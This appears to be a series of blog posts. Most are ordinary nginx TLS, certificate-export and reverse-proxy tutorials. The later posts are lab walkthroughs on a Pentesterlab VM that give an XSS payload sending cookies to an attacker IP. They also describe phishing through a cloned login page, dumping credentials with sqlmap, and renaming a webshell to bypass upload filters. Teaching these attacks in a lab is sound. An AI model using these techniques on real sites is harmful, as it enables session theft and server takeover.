I was testing one of my sites using both securityheaders and ssllabs, and found that I was being marked down for a weak Diffie-Hellman key exchange and for supporting certain weak cryptographic algorithms.
I was determined to get an A+ on both, and with a bit of trial and error this is how to configure nginx to use strong Diffie-Hellman parameters and force the server to use only certain algorithms.
If you are using a proxy as per our other tutorials, you will need to treat this new .pem file the same way as the web certificate: create it on the web server, then move a copy to the proxy server and point to it as you would your .cer and .key files. However, the “ssl_ciphers” entry only needs to be on the web server. In this example our site is named ‘site1.com’.
To create our new Diffie-Hellman parameters, on the webserver we run sudo openssl dhparam -out dhsite1params.pem 2048
This will create our .pem file, which we then move to the same location as our .key and .cer files so they can be easily referenced.
The line we need to add is "ssl_dhparam /etc/nginx/dh/dhsite1params.pem;"
To ensure we are only using strong encryption ciphers we also need to add a few more lines to our site file.
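A minimal sketch of the relevant lines in the site file, pulling the pieces above together. The certificate and key paths and filenames are illustrative assumptions (matching the directory layout used elsewhere in these tutorials), and the cipher list is one common strong set rather than the only valid choice:

```nginx
server {
    listen 443 ssl;
    server_name site1.com;

    # Assumed paths/filenames; use your own .cer and .key locations
    ssl_certificate     /cert/crt/site1.cer;
    ssl_certificate_key /cert/key/site1.key;

    # The custom Diffie-Hellman parameters we generated above
    ssl_dhparam /etc/nginx/dh/dhsite1params.pem;

    # Restrict to modern protocols and strong ciphers
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_prefer_server_ciphers on;
    ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384;
}
```

After editing, test with sudo nginx -t and reload nginx before re-running the scans.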
In a previous post we set up a reverse proxy server; see here for the tutorial.
Now we need to configure our sites for HTTPS.
For this to work correctly, with no browser warnings when visiting the sites, we need the website certificates and private keys on both the reverse proxy server and the web server behind it. Then we reference them in the site files.
To configure HTTPS for your nginx server you can follow the tutorial here
Always bypass the proxy during configuration to make sure the site is working correctly over HTTPS before moving on to configuring the reverse proxy.
Once you have confirmed your site is working, copy the certificate and private key over to the reverse proxy server. In this case we put them in directories named /cert/crt and /cert/key.
Open the virtual host file for each site, which if you followed the previous tutorials would be like so.
Recently I was playing around with proxy servers, and while trying to get an HTTPS site working I needed to export my SSL certificate from an IIS server for use on a Linux server. Windows exports to a .pfx extension, which won’t work in Linux, and I would also need to extract the private key.
After a bit of googling I found the answer.
From The Windows machine.
From Start Menu click RUN then type mmc
Click FILE >> Add/Remove Snap-In
Click Certificates >> Add
Choose Computer Account
Click Next then select Local Computer and then Finish
Use + to expand the Local Computer Certificates console tree, go to the Personal directory and expand the Certificates folder.
Right click the Certificate you need and choose All Tasks >> Export
Choose Yes, export private key and Include all certificates in certificate path if possible. (You don’t want to delete the private key unless you are SURE that you won’t need it on the server anymore. If unsure just leave it.)
Leave all other settings, and set a password. (don’t forget it!)
Save the .pfx file in your chosen location.
Now to import to Linux
Copy the .pfx file over to your Linux Server using your preferred method.
Then run the following commands, using your file name in place of “yourcertfile”. The first extracts the certificate, the second the private key: sudo openssl pkcs12 -in yourcertfile.pfx -clcerts -nokeys -out newcertfile.cer sudo openssl pkcs12 -in yourcertfile.pfx -nocerts -nodes -out newkeyfile.key
Now you have 2 new files, one .cer which is your certificate, and a .key which is your private key file.
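It is worth a quick sanity check that the two extracted files really are a matching pair before deploying them. One way is to compare the digest of each file’s RSA modulus; the sketch below generates a throwaway self-signed pair to demonstrate, so substitute newcertfile.cer and newkeyfile.key from the steps above:

```shell
# Generate a throwaway self-signed cert/key pair for demonstration
# (replace demo.cer/demo.key with your extracted files)
openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj "/CN=demo" \
    -keyout demo.key -out demo.cer 2>/dev/null
# A certificate and its private key share the same RSA modulus,
# so their modulus digests must be identical
cert_mod=$(openssl x509 -noout -modulus -in demo.cer | openssl md5)
key_mod=$(openssl rsa -noout -modulus -in demo.key | openssl md5)
[ "$cert_mod" = "$key_mod" ] && echo "certificate and key match"
```

If the digests differ, you have mixed up files from different exports.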
Last thing is to delete the .pfx file from the Linux server. You don’t want copies of this lying around if they aren’t needed. If you do need to keep a copy, then copy it onto an encrypted USB and keep it safe.
To delete from your Linux server, from the directory it is located just use sudo rm yourcertfile.pfx
I’m a big fan of Ubuntu and nginx, and in this post we are going to set up a server as a reverse proxy server.
What is, and why would you need, a reverse proxy server?
A reverse proxy server sits between the internet and your web servers to process requests, performing load balancing and caching if required.
A reverse proxy server can also be used if you only have one external IP address but want to run multiple websites. You could use port forwarding and assign a port to each site, but I find this messy, it takes more configuration, and it is less than ideal. I don’t want my URL to be https://2code-monte.co.uk:8080, for example.
Let’s get to it. In this example we have 1 external IP address but we want to have 2 external websites named “site1.com” which has an internal IP of 220.127.116.11, and “site2.com” which has an internal IP of 18.104.22.168.
On your Ubuntu Server install nginx sudo apt-get install nginx
Then create a virtual host file for each site. sudo nano /etc/nginx/sites-available/site1
Enter the following text into the file and save. Then repeat for site2 but replace “server_name” and “proxy_pass” with the appropriate details for site2.
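A minimal virtual host along these lines would do the job. This is a sketch, assuming site1’s backend is the internal address given above; the proxy_set_header lines pass the original host and client IP through to the backend:

```nginx
server {
    listen 80;
    server_name site1.com;

    location / {
        # Forward requests to the internal web server for site1
        proxy_pass http://220.127.116.11;
        # Preserve the original host header and client address
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}
```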
In order for the sites to be available we need to create a link to the sites-enabled directory. sudo ln -s /etc/nginx/sites-available/site1 /etc/nginx/sites-enabled/site1 sudo ln -s /etc/nginx/sites-available/site2 /etc/nginx/sites-enabled/site2
It’s always good to test your configuration after any changes, you do this like so. sudo nginx -t
Then we need to reload nginx sudo systemctl reload nginx
Next we want to lock the server down as it will be proxying all web traffic so we want to make sure our firewall is enabled and only the required ports are open.
In this example we are only running http sites so we only need port 80 open, unless you are connecting via ssh to administer the server.
We are using ufw sudo ufw enable sudo ufw allow http
If ssh is needed sudo ufw allow ssh
You can now check that only the required ports are open by using sudo ufw status
You should get something like this:
80 ALLOW Anywhere
80 (v6) ALLOW Anywhere
If you have also enabled ssh it will also show up twice.
That’s it. All that is left to do is ensure all web traffic to your external IP goes to the proxy server and it will forward the request. You can add more sites by creating new virtual host files for each new site, but don’t forget to link them to the sites-enabled directory.
In an up-coming post we will show you how to use https sites over your new nginx proxy server.
Here we demonstrate why you should be filtering any user input.
This shows how easy it is for an attacker to plant some malicious code on a site and steal the admin login credentials (Or another user), by using Cross-Site-Scripting. There is a great explanation on OWASP’s website.
First we test the text areas for correct input validation and when we find it is not being correctly checked we then look to exploit that flaw.
By injecting the following payload, enclosed in script tags, we can send the stolen cookies to our PC: document.write('<img src="http://192.168.56.104/?'+document.cookie+'"/>'); We can then reuse the cookies on the site to gain access to the admin panel, and from there add malicious code, create new users, or look to get root access on the server.
The site is on 192.168.56.103 and our attacking machine is on 192.168.56.104.
To demonstrate this we are using the “XSS and MySQL File” VM from Pentesterlab.com
In this video we start off by using “wget” to clone the site we are attacking, so that when users are redirected to our site they are less suspicious, as any differences are subtle and won’t generally be noticed by normal users. Then we load the cloned pages on our web server. For the purpose of the demo we have left the IP address showing in the address bar so you can see the difference. The original site is on .105 and our clone is on .104 (poisoning the hosts file or typo-squatting is a whole tutorial by itself).
Back to the hack. We have enough access that if we wanted to we could upload our own pages and replace the existing ones, but for the purpose of this we are going to change where the login URL points, so it sends users to our clone site rather than the correct login page.
We could obviously do this with every link on the site. We could also just upload some further malicious code to the server so that every visitor to the site will have their browser injected with malicious code.
Today we are going to show how an attacker can leverage SQL Injection to redirect users to their own site/webpage for whatever malicious activity they choose.
This will be in two parts. The first will show how, using a tool called sqlmap, we can carry out successful SQL Injection and very quickly dump usernames and passwords. The “php?id=1” part of the URL is injectable, and this is what sqlmap will exploit.
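For illustration, a typical sqlmap invocation against an injectable id parameter looks something like this; the URL and table name are placeholders, not the lab’s actual values:

```shell
# Illustrative only: probe the id parameter and dump a table.
# --batch answers sqlmap's prompts with defaults; adjust the URL
# and -T table name for your own target.
sqlmap -u "http://target.example/index.php?id=1" --batch --dump -T users
```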
Then, once we have access to the admin section, we upload our PHP shell. The site has some basic filtering, so we change the filename and extension from “b374k-2.8.php” to “b374k-2.8 (copy).jpg.phtml”, which gets us past the filtering controls. It also shows why, even in password-protected areas of your site, you still need robust upload controls: if someone manages to access the area, they will still have to work to be able to upload a shell. Always think security in depth. Always add layers.
This video ends with us logging into the uploaded webshell and accessing the www directory.